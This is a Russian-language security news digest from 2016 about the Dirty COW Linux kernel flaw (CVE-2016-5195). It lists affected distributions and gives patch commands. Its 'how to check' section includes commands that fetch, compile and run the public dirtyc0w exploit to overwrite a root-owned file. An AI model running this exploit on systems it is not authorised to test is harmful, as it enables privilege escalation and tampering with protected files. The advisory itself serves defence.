Новости

Дайджест безопасности 22.10.2016

Опасная уязвимость в Linux

В ядре Linux обнаружена опасная уязвимость, которая связана с обработкой подсистемой памяти ядра механизма copy-on-write (COW). При эксплуатации уязвимости неавторизованный локальный пользователь сможет получить доступ к memory mappings с правом записи, хотя доступ должен быть ограничивать только чтением (read-only). Уязвимости присвоен номер CVE-2016-5195.

Уязвимые дистрибутивы

  1. Red Hat Enterprise Linux 7.x
  2. Red Hat Enterprise Linux 6.x
  3. Red Hat Enterprise Linux 5.x
  4. CentOS Linux 7.x
  5. CentOS Linux 6.x
  6. CentOS Linux 5.x
  7. Debian Linux wheezy
  8. Debian Linux jessie
  9. Debian Linux stretch
  10. Debian Linux sid
  11. Ubuntu Linux codecise (LTS 12.04)
  12. Ubuntu Linux trusty
  13. Ubuntu Linux xenial (LTS 16.04)
  14. Ubuntu Linux yakkety
  15. Ubuntu Linux vivid/ubuntu-core
  16. SUSE Linux Enterprise 11 and 12

Как проверить - есть ли уязвимость

RHEL/CentOS Linux:

$ wget https://access.redhat.com/sites/default/files/rh-cve-2016-5195_1.sh
$ bash rh-cve-2016-5195_1.sh

Другие дистрибутивы:

$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c

Из под root'а:

$ sudo -s
# echo test text > foo

Из под пользователя:

$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000

mmap 56123000
madvise 0
procselfmem 1800000000

$ cat foo

m00000000000000000

Как устранить уязвимость

Если у вас виртуальный хостинг, то устранять уязвимость должен ваш хостинг-провайдер. Обратитесь к нему и спросите устранил ли он эту уязвимость. Если у вас свой собственный сервер (или VPS), то вам необходимо самостоятельно выполнить обновление дистрибутива:

Debian/Ubuntu Linux
$ sudo apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade
$ sudo reboot

RHEL / CentOS Linux 5.x/6.x/7.x
$ sudo yum update
$ sudo reboot

RHEL / CentOS Linux 4.x
$ sudo up2date -u
$ sudo reboot

Suse Enterprise Linux or Opensuse Linux
# zypper patch
# reboot

Поделиться:
к списку новостей